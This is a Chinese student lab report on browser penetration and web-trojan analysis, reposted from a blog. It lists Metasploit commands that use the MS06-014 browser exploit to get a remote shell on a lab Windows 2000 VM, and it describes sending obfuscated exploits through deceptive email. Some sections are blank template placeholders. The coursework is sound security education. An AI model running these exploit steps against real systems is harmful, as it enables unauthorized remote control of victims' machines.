ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

20211914涂可新 2021-2022-2 《网络攻防实践》实践十一报告

2022-05-29 23:32:00  阅读:478  来源: 互联网

标签:文件 渗透 浏览器 涂可新 实践 攻击 2021 http


20211914涂可新 2021-2022-2 《网络攻防实践》实践十一报告

1.实践内容

总结一下本周学习内容并介绍下实践内容,不要复制粘贴

2.实践过程

2.1web浏览器渗透攻击

任务:使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。
实验步骤:
①选择使用Metasploit中的MS06-014渗透攻击模块
②选择PAYLOAD为任意远程Shell连接
③设置服务器地址和URL参数,运行exploit,构造出恶意网页木马脚本
④在靶机环境中启动浏览器,验证与服务器的连通性,并访问而已网页木马脚本URL
⑤在攻击机的Metasploit软件中查看渗透攻击状态,并通过成功渗透攻击后建立起的远程控制会话SESSION,在靶机上远程执行命令
本次实践所使用虚拟机网络配置皆设置为桥接模式:

虚拟机 IP地址
Kali 172.30.6.230
Win2kServer 172.30.1.222

step1
提权,启动msfconsole。

step2
输入指令:search MS06-014搜索Metasploit中的MS06-014渗透攻击模块。
再输入指令:use exploit/windows/browser/ie_createobject使用MS06-014渗透攻击模块。

step3
输入指令:set Lhost 172.30.6.230配置攻击机IP,输入指令:set Rhost 172.30.1.222配置靶机IP。
输入指令:set payload windows/shell/bind_tcp将PAYLOAD设置为远程Shell连接。

step4
输入指令:exploit构造出恶意网页木马脚本,回车后得到本地地址:http://172.30.6.230:8080/ighKZrcn4。

step5
打开靶机Win2kServer的浏览器,访问step4得到的本地地址http://172.30.6.230:8080/ighKZrcn4,浏览器会返回一串字符串。

step6
回到攻击机kali,发现攻击机和靶机之间已经建立了会话连接。

step7
输入指令:sessions -i 1选择会话,返回shell。
浏览器攻击攻击成功,输入ipconfig,在靶机上远程执行查看Win2kServerIP地址。

2.2取证分析实践—网页木马攻击场景分析

实践步骤:
①首先你应该访问start.html,在这个文件中给出了new09.htm的地址,
②在进入 htm 后,每解密出一个文件地址,请对其作 32 位 MD5 散列,以散列值为文件名到 http://192.168.68.253/scom/hashed/哈希值下去下载对应的文件(注意:文件名中的英文字母为小写,且没有扩展名),即为解密出的地址对应的文件。
③如果解密出的地址给出的是网页或脚本文件,请继续解密。
④如果解密出的地址是二进制程序文件,请进行静态反汇编或动态调试。
⑤重复以上过程直到这些文件被全部分析完成。
step1
从云班课下载网页挂马分析实践参考(上).pdf,打开文件后搜索“new09.htm”,发现有两处。


step2
在new09.htm 的代码中,用 iframe 引用了 http://aa.18dd.net/aa/kl.htm文件,又用 javascript 引用了一个 http://js.users.51.la/1299644.js文件。

step3
对http://aa.18dd.net/aa/kl.htm和http://js.users.51.la/1299644.js进行MD5散列。


step4



step5
这个23180a42a2ff1192150231b44ffdf3d3文件并不是我们需要的内容,7f60672dcd6b5e90b6772545ee219bd3文件才是,这个文件中的代码很复杂,这是因为采用了一种称为XXTEA+Base64的加密方法,为了解决这个问题,学过密码学的我们知道,关键在于找到密码,这个文件中t=utf8to16(xxtea_decrypt(base64decode(t), '\x73\x63\x72\x69\x70\x74'));将\x73\x63\x72\x69\x70\x74使用十六进制转字符串的操作,即可得到密钥script,然后我们对它进行进行XXTEA+Base64解密。

step6

2.3攻防对抗实践—web浏览器渗透攻击攻防

2.3.1攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理之后组装成一个URL,通过具有欺骗性的电子邮件发送给防守方。

2.3.2防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。

3.学习中遇到的问题及解决

  • 问题1:XXXXXX
  • 问题1解决方案:XXXXXX
  • 问题2:XXXXXX
  • 问题2解决方案:XXXXXX - ...

4.实践总结

xxx xxx

参考资料

标签:文件,渗透,浏览器,涂可新,实践,攻击,2021,http
来源: https://www.cnblogs.com/tkx1914/p/16325289.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有